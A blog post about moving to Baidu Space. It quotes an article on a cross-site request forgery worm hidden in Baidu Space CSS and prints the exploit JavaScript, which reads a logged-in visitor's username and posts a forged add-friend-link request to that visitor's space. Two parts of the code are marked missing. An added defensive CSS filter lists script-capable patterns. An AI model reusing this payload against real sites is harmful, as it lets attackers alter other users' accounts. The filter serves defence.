
Blog


    07 August

    Some Opinions on Baidu Space

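    Recently, because of the frequent changes to livespace (there seems to have been another change this afternoon) and the fresh launch of Baidu Space, many people have started thinking about moving, and I considered it too. To be honest, although Baidu Space offers relatively few themes and other decorative settings, its approach of opening up CSS has still attracted a lot of people; anyone who knows a little web design can make the result several times better than msnspace. But I happened to come across the article below and was suddenly put on alert: for someone like me who knows nothing about web programming, moving would amount to choosing between keeping things as they are and playing with fire XX. While writing this, I happened to see that Baidu had dissolved its software business division within 4 hours, and that Baidu's management has said on various occasions that it wants to turn Baidu into "search + blog" (see the trackback for the URL), so I believe Baidu Space will certainly change in the future. So while both spaces are changing, I think a wait-and-see attitude is still best; after all, neither is satisfactory in terms of functionality.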
     
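                       Baidu Space Has a Security Vulnerability; Users Threatened with Data Deletion
    After Baidu Space went live, many users frantically copied CSS code to promote their own Baidu Space. At the same time, malicious actors appeared on Baidu Space who use its features to insert their own code, and this code is malicious, putting Baidu Space users at risk.

      This is a request for help that a user sent by message; the original text follows:

      A hacker used javascript to change my links.. and threatened that if I delete the link he will delete my space. People like this are what I fear most.. I'd like to ask you whether he can use the same technique to tamper with other information on my page.. It would be best if you could tell me how to deal with people like this, I'm really out of ideas, so frustrating.. Thanks..

      Looking at this "hacker's" space, it is easy to see that he uses CSS code to inject JS code. Using that JS, and having analyzed the parameters Baidu Space sends when submitting data, he constructed a malicious script that submits an add-friend-link request to Baidu Space. As a result, any logged-in Baidu Space user who visits that site automatically gets a friend link added to their own space.

      Below is the exploit code: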

    code:

      javascript:document.body.onload = function(){
        var req = null;
        if(window.XMLHttpRequest) req = new XMLHttpRequest();
        else if(window.ActiveXObject){
          var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
          // (the rest of this loop is missing from the page)
          for(var i=0;i
          try{req.overrideMimeType('text/xml')}catch(e){}
        }
        // fetch the current page synchronously, using the visitor's session
        req.open('get','.',false);
        req.send();
        var s=req.responseText;
        // continue only if the visitor is logged in (a logout link is present)
        p=s.indexOf('passport.baidu.com/?logout');
        if(p>0)
        {
          // (the search string is missing from the page)
          p=s.indexOf('');
          if(p>0)
          {
            // extract the visitor's username from the page source
            p=s.indexOf('/',p);
            p2=s.indexOf(String.fromCharCode(34),p);
            var user=s.substring(p+1,p2);
            // percent-encoded name, URL and description of the friend link to add
            var name='+%B0%D9%B6%C8%BF%D5%BC%E4%B7%A2%CC%FB%D6%FA%CA%D6 ';
            var link='http://hi.baidu.com/haomm';
            var desc='%CA%B9%C4%E3%B5%C4%B0%D9%B6%C8%BF%D5%BC%E4%D6%A7%B3%D6html%B7%A2%CC%FB';
            // post the add-friend-link form to the visitor's own space
            var url='/'+user+'/commit';
            var data='ct=6&cm=1&spRef='+escape('http://hi.baidu.com/'+user)+'%2Fmodify%2Fbuddylink%2F0&spBuddyName='+escape(name)+'&spBuddyURL='+escape(link)+'&spBuddyIntro='+escape(desc);
            req.open('post',url,false);
            req.send(data);
          }
        }
      }


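      Analysis:

      Risk level of this method: high. Suitably constructed JS code could delete all data in a user's space. No malicious deletion through this vulnerability has been observed so far, but it is dangerous enough; users should be careful.

      Solution:

      Because an attacker could use a Baidu Space under any username to submit add, delete, and modify links, there is currently no perfect solution.

      Fix for those already affected: delete the malicious link, and no longer visit that space's link while logged in.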
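
The article's advice above covers only what a visitor can do; on the hosting side, the usual countermeasure is to screen user-supplied CSS before it is stored. The following is an added example, not code from the original article or from Baidu: a JavaScript filter that flags script-capable CSS constructs even when they are hidden with comments or CSS escapes. The article does not say exactly how the script was embedded in the CSS, so the rule list is an assumption, and all function names, rule names and sample inputs are constructed for illustration.

```javascript
// Added example: screen user-supplied CSS for script-capable constructs.
// Rule names and function names are hypothetical, not from any real product.

// Constructs that let legacy browsers run script or load remote code from CSS.
const RULES = [
  ['script-url', /(?:javascript|vbscript):/],
  ['expression', /expression\(/],
  ['behavior', /behavior:/],
  ['moz-binding', /-moz-binding:/],
  ['import', /@import/],
];

// Undo the obfuscations a CSS parser tolerates, so the rules see what the browser sees.
function normalizeCss(css) {
  return css
    .replace(/\/\*[\s\S]*?\*\//g, '')                   // comments: exp/**/ression
    .replace(/\\([0-9a-fA-F]{1,6})\s?/g, (_, hex) => {  // hex escapes: \6a -> j
      const cp = parseInt(hex, 16);
      return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : '';
    })
    .replace(/\\([^\n])/g, '$1')                        // other escapes: \p -> p
    .replace(/[\s\u0000-\u001f]+/g, '')                 // whitespace and control chars
    .toLowerCase();
}

// Return the names of all rules the stylesheet trips; an empty array means clean.
function findScriptCapableCss(css) {
  const flat = normalizeCss(css);
  return RULES.filter(([, re]) => re.test(flat)).map(([name]) => name);
}

// Constructed sample stylesheets (not taken from the article).
const SAMPLES = {
  benign: 'body { background: #fff url(/img/bg.png) repeat-x; color: #333 }',
  plainUrl: 'body { background: url(javascript:void 0) }',
  hexEscaped: 'div { background: url(\\6a\\61 vascript:void 0) }',
  commentSplit: 'p { width: exp/**/ression(1) }',
};

for (const [name, css] of Object.entries(SAMPLES)) {
  console.log(name, findScriptCapableCss(css));
}
```

A stylesheet that trips any rule should be rejected outright rather than rewritten, since partial stripping can itself reassemble a blocked token.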
